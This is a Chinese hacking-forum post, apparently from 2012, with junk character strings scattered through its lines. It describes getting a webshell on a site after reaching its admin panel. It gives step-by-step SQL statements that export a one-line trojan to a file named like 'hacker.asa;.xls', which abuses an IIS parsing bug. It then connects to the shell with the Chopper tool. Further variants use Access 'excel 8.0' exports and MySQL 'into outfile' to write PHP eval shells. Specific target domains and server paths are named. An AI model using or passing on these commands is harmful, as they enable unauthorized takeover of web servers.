好不容易进了后台,发现啥上传啊。备份啊多木有。
* ~5 F) P# N+ l: V3 D9 U2 _webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
$ E7 W, `9 F$ W) P) M5 b' h, e文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
" O$ w! D* o; ]7 `+ n然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:& e5 H7 l* {- O' `$ j" J
1.create table cmd (a varchar(50))# E: ]! N: C$ J- I3 T1 m, i; m
2.insert into cmd (a) values (‘‘)9 }. W7 |0 [( [: l' e, v
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
! y8 q* ^! h# Q(把表cmd的内容导出为物理路径的一个EXCEL文件)
1 z& S$ L# F. x4.drop table cmd
$ J9 D6 v+ L2 N' U+ E利用IIS的BUG成功拿到了WEBSHELL。
J* M" S/ A9 @, W" o
: \4 k# [/ A5 _/ b/ _直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话6 ^9 y# L, @; O: a! q' F
: Z3 V6 R9 i! t* A0 Z/ K" h
SQL语句意思解释:
. c. ~6 R, p# ] T/ F 第一句
$ O$ R% u; }5 o; e2 u8 s 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
3 z$ K" a; x8 R7 M r! }
v5 M" U3 W# D0 U3 o( P9 s 第二句; g; J* N! A, @- b2 e" Q8 p: F
在表cmd的a字段插入一句话木马
& {1 u6 }' m1 u2 i: e" X. I- m# w 第三句8 C; Z8 ? p0 }+ T' A1 t
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件# l# H; p, }2 {' R
G+ d: `. i" F7 L. f1 b7 ^
第四句' x$ D( t9 A3 m& l+ y4 L
删除建立的cmd表
* a& ~& y' p' @' A0 p( m
- k" d+ V$ A' d' w' q! x 以下内容为测试:
, m9 t# j: I+ ~& f Access利用后台SQL执行命令功能导出WebShell:
! i; m0 A0 e! R/ H) P2 @) G. U 这个更简单:
8 U) u2 P. R+ E5 _! Z, H [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]; S4 B0 R* v) z& [/ Z" D
或者
" W6 Z- l* D% _ [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
5 V; T& _; u5 Y; Q
. d! K# {! [; i& p! F5 _ 后台有执行SQL语句功能(vote为已知表段)
. K! H7 ^' P) ` 希望对大家有所帮助拿shell的又一个思路
7 E( u3 ~6 x' @% u! q+ f* j |
发表于 2012-9-13 17:53:58
收藏
支持
反对